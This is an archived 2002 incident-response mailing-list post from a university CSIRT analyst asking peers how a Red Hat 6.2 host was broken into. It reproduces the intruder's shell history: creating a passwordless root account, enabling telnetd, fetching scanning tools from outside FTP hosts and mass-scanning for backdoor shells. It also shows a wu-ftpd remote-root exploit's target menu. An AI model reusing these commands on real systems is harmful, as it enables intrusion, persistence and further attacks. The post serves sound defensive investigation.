-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Fellow Analysts: This morning several of our systems were compromised and am still working to find out what exploit was used. Please offer any advice you can. A utility was left behind along with a massive amount of systems in output log files that was created by this utility. I have provided all my information below. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= My notes - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= I went through the system and found the following things. The /tmp directory was the hackers home directory he was using. Turns out he deleted that .bash_history file and forgot to nail /root/.bash_history However, it is still unclear to me how he broke in. Notice that he did an "echo telnetd >>" over to inetd.conf and started up telnetd. Yeh, he could have run the telnetd b0f exploits against it but whats the point? He already had root access to the machine. I also checked the version of SSHD, I've checked its version against my 500 TARGETS for ./x2, ./x3 and ./x5 and doesn't seem to match anything. I checked to see if snmp was running (wasn't running). Does anyone know if Redhat 6.2 default install contained a vulnerable wu_ftpd? Unfortunately the machine was rebuilt before I could check the version of wu_ftpd. I went ahead and checked my exploits for it and wonder if anyone here had any default wuftpd installs of redhat 6.2 hit? If anyone has responded to a similar machine, please let me know! Eric [loki@tigerteam1 woot]$ ./forcer -t0 ./forcer magic ./forcer <type> <addr> 1) RH7.2 - 2.6.2(1) Wed Aug 9 05:54:50 EDT 2002 2) RH7.2 - wu-2.6.2(2) 3) Special wu-2.6.3(3) [loki@tigerteam1 new]$ ./wu-sploit -t0 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). Compiled for MnM 01/12/2001..pr0t! num . description - ----+------------------------------------------------------- 1 | Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm] 2 | Debian potato [wu-ftpd_2.6.0-3.deb] 3 | Debian potato [wu-ftpd_2.6.0-5.1.deb] 4 | Debian potato [wu-ftpd_2.6.0-5.3.deb] 5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb] 6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm] 7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm] 8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm] 9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm] 10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm] 11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm] 12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm] 13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm] 14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm] 15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm] 16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm] 17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm] 18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm] 19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] 20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm] 21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm] 22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm] 23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm] 24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm] 25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm] 26 | SuSE 7.0 [wuftpd.rpm] 27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm] 28 | SuSE 7.1 [wuftpd.rpm] 29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm] 30 | SuSE 7.2 [wuftpd.rpm] 31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm] 32 | SuSE 7.3 [wuftpd.rpm] 33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm] 34 | Slackware 7.1 [root@tigerteam1 floppy]# telnet 192.168.0.1 22 Connected to 192.168.0.1 22 Escape character is '^]'. SSH-1.99-OpenSSH_3.0.2p1 - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= System Info - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= Redhat 6.2 (default install) SSHD RPC* - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= # ps -aux - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= root 1 0.0 0.1 1120 416 ? S Feb25 0:04 init root 2 0.0 0.0 0 0 ? SW Feb25 0:00 [keventd] root 3 0.0 0.0 0 0 ? SW Feb25 0:00 [kapm-idled] root 4 0.0 0.0 0 0 ? SWN Feb25 0:00 [ksoftirqd_CPU0] root 5 0.0 0.0 0 0 ? SW Feb25 0:10 [kswapd] root 6 0.0 0.0 0 0 ? SW Feb25 0:00 [kreclaimd] root 7 0.0 0.0 0 0 ? SW Feb25 0:00 [bdflush] root 8 0.0 0.0 0 0 ? SW Feb25 0:00 [kupdated] root 9 0.0 0.0 0 0 ? SW Feb25 0:00 [khubd] bin 348 0.0 0.1 1212 484 ? S Feb25 0:00 portmap rpcuser 368 0.0 0.2 1340 544 ? S Feb25 0:00 rpc.statd root 382 0.0 0.1 1104 400 ? S Feb25 0:00 /usr/sbin/apmd -p 10 -w 5 -W -s /etc/sysconfig/apm-scripts/suspend -r root 434 0.0 0.1 1208 444 ? S Feb25 0:00 /usr/sbin/automount --timeout 60 /misc file /etc/auto.misc root 436 0.0 0.1 1208 500 ? S Feb25 0:00 /usr/sbin/automount --timeout 60 /home file /etc/auto.home root 441 0.0 0.1 1208 444 ? S Feb25 0:00 /usr/sbin/automount --timeout 60 /auto file /etc/auto.auto root 483 0.0 0.3 6264 1016 ? S Feb25 0:00 /sbin/mount.smbfs //physast1/Export /physast1 -o rw username turnshek root 502 0.0 0.1 1172 500 ? S Feb25 0:06 syslogd -m 0 root 511 0.0 0.1 1944 436 ? S Feb25 0:10 klogd nobody 525 0.0 0.2 1312 600 ? S Feb25 0:00 identd - -e -o nobody 529 0.0 0.2 1312 600 ? S Feb25 0:00 identd - -e -o nobody 530 0.0 0.2 1312 600 ? S Feb25 0:03 identd - -e -o nobody 531 0.0 0.2 1312 600 ? S Feb25 0:03 identd - -e -o nobody 532 0.0 0.2 1312 600 ? S Feb25 0:00 identd - -e -o daemon 543 0.0 0.1 1144 464 ? S Feb25 0:00 /usr/sbin/atd root 557 0.0 0.2 1328 556 ? S Feb25 0:00 crond root 575 0.0 0.1 1156 496 ? S Feb25 0:00 inetd root 589 0.0 0.1 1204 440 ? S Feb25 0:00 lpd root 615 0.0 0.1 1192 316 ? S Feb25 0:00 rpc.rquotad root 645 0.0 0.1 1248 364 ? S Feb25 0:00 rpc.mountd root 654 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] root 655 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] root 656 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] root 657 0.0 0.0 0 0 ? SW Feb25 0:00 [lockd] root 658 0.0 0.0 0 0 ? SW Feb25 0:00 [rpciod] root 659 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] root 660 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] root 661 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] root 662 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] root 663 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] condor 696 0.0 0.4 2816 1080 ? S Feb25 1:12 /auto/condor/sbin/condor_master condor 704 0.0 0.6 3596 1576 ? S Feb25 0:56 condor_startd -f condor 715 0.0 0.4 3324 1060 ? S Feb25 0:00 condor_schedd -f root 741 0.0 0.3 2432 780 ? S Feb25 0:00 sendmail: accepting connections root 756 0.0 0.1 1156 408 ? S Feb25 0:00 gpm -t imps2 xfs 803 0.0 0.4 3404 1072 ? S Feb25 0:01 xfs - -droppriv -daemon -port -1 root 846 0.0 0.2 2092 672 ? S Feb25 0:29 sshd root 852 0.0 0.1 1092 336 tty1 S Feb25 0:00 /sbin/mingetty tty1 root 853 0.0 0.1 1092 336 tty2 S Feb25 0:00 /sbin/mingetty tty2 root 854 0.0 0.1 1092 336 tty3 S Feb25 0:00 /sbin/mingetty tty3 root 855 0.0 0.1 1092 336 tty4 S Feb25 0:00 /sbin/mingetty tty4 root 858 0.0 0.1 1092 336 tty5 S Feb25 0:00 /sbin/mingetty tty5 root 859 0.0 0.1 1092 336 tty6 S Feb25 0:00 /sbin/mingetty tty6 root 860 0.0 0.2 2744 620 ? S Feb25 0:00 /usr/bin/gdm -nodaemon root 865 2.8 2.5 48200 6564 ? S Feb25 358:24 /etc/X11/X -auth /var/gdm/:0.Xauth :0 root 866 0.0 0.3 3452 972 ? S Feb25 0:00 /usr/bin/gdm -nodaemon turnshek 19979 0.0 0.7 5640 1864 ? S Mar03 0:00 /usr/bin/gnome-session turnshek 20009 0.0 0.6 5436 1596 ? S Mar03 0:00 gnome-smproxy --sm-config-prefix /.gnome-smproxy-lr5q76/ --sm-client- turnshek 20013 0.0 0.6 4376 1676 ? S Mar03 0:03 enlightenment -theme /usr/share/enlightenment/themes/CleanBig -smfile turnshek 20019 0.9 0.7 5968 2036 ? S Mar03 32:05 magicdev --sm-client-id 11888e7113000098519292400000009670005 turnshek 20030 0.0 0.3 2636 804 ? S Mar03 0:00 gnome-name-service turnshek 20032 0.0 1.0 7072 2652 ? S Mar03 0:01 panel - --sm-config-prefix /panel.d/Session-Cjxxlw/ --sm-client-id 1188 turnshek 20034 0.0 0.6 3188 1648 ? S Mar03 0:05 xscreensaver -no-splash -timeout 20 -nice 10 turnshek 20036 0.0 0.9 7536 2404 ? S Mar03 0:00 gmc - --sm-config-prefix /gmc-mKvBkw/ --sm-client-id 11888e711300009851 turnshek 20042 0.0 0.9 6100 2388 ? S Mar03 0:09 gnomepager_applet --activate-goad-server gnomepager_applet turnshek 20044 0.0 0.9 6068 2308 ? S Mar03 0:00 gen_util_applet --activate-goad-server gen_util_applet turnshek 22000 0.1 2.0 56824 5168 ? S Mar04 4:55 /usr/lib/netscape/netscape-communicator -irix-session-management turnshek 22016 0.0 0.2 16660 664 ? S Mar04 0:00 (dns helper) turnshek 22046 0.0 0.8 5832 2096 ? S Mar04 0:08 gnome-terminal turnshek 22047 0.0 0.1 1144 440 ? S Mar04 0:00 gnome-pty-helper turnshek 22048 0.0 0.2 2424 600 pts/0 S Mar04 0:00 -csh turnshek 25361 0.0 0.8 5800 2100 ? S Mar05 0:00 gnome-terminal turnshek 25362 0.0 0.1 1144 440 ? S Mar05 0:00 gnome-pty-helper turnshek 25363 0.0 0.2 2424 600 pts/1 S Mar05 0:00 -csh root 7402 0.0 0.3 1704 928 ? S 03:49 0:00 bash - -i root 9237 0.0 0.1 1112 404 ? S 04:50 0:00 tail - -f 211.out root 9506 0.0 0.1 1104 396 ? S 05:07 0:00 tail - -f 211.out root 10302 0.0 0.1 1100 384 ? S 06:35 0:00 tail - -f 122.out root 11808 9.8 0.2 1416 692 ? RN 07:36 0:25 ./synscan 130 130.out eth0 30000 1524 root 11812 52.3 0.2 1412 692 ? RN 07:36 2:13 ./synscan 130 130.out eth0 30000 1524 root 11817 0.0 0.0 0 0 ? ZN 07:38 0:00 [synscan <defunct>] root 11818 0.0 0.0 0 0 ? ZN 07:38 0:00 [synscan <defunct>] root 11819 0.0 0.0 0 0 ? ZN 07:38 0:00 [synscan <defunct>] root 11820 0.0 0.0 0 0 ? ZN 07:38 0:00 [synscan <defunct>] root 11821 0.0 0.0 0 0 ? ZN 07:38 0:00 [synscan <defunct>] root 11822 0.0 0.0 0 0 ? ZN 07:39 0:00 [synscan <defunct>] turnshek 11825 26.4 2.6 21660 6864 ? RN 07:39 0:16 sproingies -root root 11830 0.0 0.0 0 0 ? ZN 07:39 0:00 [synscan <defunct>] root 11834 0.6 0.6 2996 1580 ? S 07:40 0:00 sshd root 11835 0.0 0.3 1724 972 pts/2 S 07:40 0:00 -bash root 11859 0.0 0.3 2556 872 pts/2 R 07:40 0:00 ps - -augxw - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= Contents of /etc/passwd - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= u:x:12347:12347::/tmp:/bin/bash r:x:0:12348::/tmp:/bin/bash - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= Output generated by synscan1.6.tar (contains ip addresses of systems with Port 1524 (ingreslock) open, logging connections that produce a # prompt - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= 122.out 128.out 130.out 218.out - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= .bash_history - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -= uname -a; cat /proc/cpuifo; cat /proc/cpuinfo' '; cat /proc/cpuinfo; ping -c 5 www.yahoo.com; /usr/sbin/adduser -p "" u; tail /etc/passwd; /usr/sbin/adduser -p "" -d /tmp u; /usr/sbin/adduser -p "" -d /tmp -u 0 r; grep rsdh /etc/inetd.conf; grep rsh /etc/inetd.conf; grep shell /etc/inetd.conf; cat /etc/inetd.conf; ls -al /etc/inetd.conf; locate ...; /sbin/ifconfig -a; dmesg | grep -i promi; tail /etc/rc.d/rc.local; ps auwx| grep named; cat /etc/redhat-rel*; ps auwx| grep stat; exit; la -L /UAE/AVIN/IN.DRPS; ls -al /usr/sbin/in.ftpd; locate in.ftpd; tail /etc/passwd; echo "telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd" >> /etc/inetd.conf; ps auwx| grep inetd; kill -HUP 575; exit; cat /etc/hosts.deny; mv /etc/hosts.deny /etc/host.deny; exit; locate in.rlogin; ls -al /usr/sbin/in.*; locate telnet; ping -c 10 www.yahoo.com; wget; which lynx; ncftp cd /tmp; #cd /tmp;ncftpget -u <SANITIZED> -p <SANITIZED> ftp://211.23.134.186/../../home/test3/t0rnscan;rm -rf /root/.ncftp;chmod 755 t0rnscan; cd /tmp;ncftpget -u <SANITIZED> -p <SANITIZED> ftp://211.172.226.26/../../tmp/synscan; ls -al; cat fuk.ps; chmod 755 synscan; nohup ./synscan 216 216.out eth0 10000 1524 >/dev/null 2>/dev/null&2>/dev/null; ping -c 5 www.yahoo.com; ls -al 216.out; ls -al 216.out; grep "#" 216.out; ls -al 216.out; grep "#" 216.out;exit; cd /tmp; grep "#" *.out; tail 216.out; tail 216.out; tail 216.out; grep access *.out; tail 216.out; grep "#" 216.out; tail 216.out; tail 216.out; tail 216.out; ps auwx| grep synscan; tail 216.out; tail 216.out; killall -9 synscan; egrep "access|#" *.out; rm -rf 216.out; killall -9 synscan; nohup ./synscan 217 217.out eth0 30000 1524 >/dev/null 2>/dev/null&2>/dev/null; ping -c 5 www.yahoo.com; ls -al 217.out; cat 217.out; cat 217.out; tail 217.out; grep "#" 217.out; tail 217.out; tail 217.out; tail 217.out; tail 217.out; grep "#" 217.out; tail 217.out; grep "#" 217.out | grep -v root; tail 217.out; tail 217.out; tail 217.out; tail 217.out; tail 217.out; grep "#" 217.out; tail 217.out; tai217.out; tail 217.out; grep "#" 217.out | grep -v root; rm -rf 217.out; nohup ./synscan 218 218.out eth0 30000 1524 >/dev/null 2>/dev/null&2>/dev/null; ls -al 218.out; ls -al 218.out; ls -al 218.out; cat 218.out; exit; cd /tmp; ls; tail 218.out; grep "#" 218.out; tail *.out; killall -9 synscan; nohup ./synscan 24 24.out eth0 50000 10008 >/dev/null 2>/dev/null&2>/dev/null; ls -al 24.out; ls -al 24.out; ls -al 24.out; ls -al 24.out; p[s auwwx| grep synscan; ps auwx| grep synscan; ls -al 24.out; ls -al 24.out; ls -al 24.out; ls -al 24.out; ping -c 5 www.yahoo.com; ping -c 5 www.yahoo.com; ls -al 24.out; killall -9 synscan; nohup ./synscan 24 24.out eth0 30000 10008 >/dev/null 2>/dev/null&2>/dev/null; ping -c 5 www.yahoo.com; tail -f 24.out&2 >/dev/null; ps auwx| grep tail; ls -al 24.out; / /sbin/ifconfig -a; locate tcp.log; last| head -5; tail /home/sandhya/.bash_history; ls -al ~sandhya; cat /home/sandhya/.history; cat ~sandhya/.history; w; ls -al 24.out; ================================================ Eric S. Hines Technical Lead Information Security Group Computer Security Incident Response Team (CSIRT) - ------------------------------------------------ University of Pittsburgh Cathedral of Learning #701 Pittsburgh PA, 15260 [ph] +1 412 624-6728 [mo] +1 412 334-2379 [em] eric3at_private [al] 4123342370at_private ================================================ -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com> iQA/AwUBPIZyXz4GESb0uqLMEQInbgCggBloMYEHfCWVbgcNKRTsu06Z/FAAnjgq wg9hokf1qGcgcYLiBI8iq+rj =2dWC -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Mar 06 2002 - 14:14:11 PST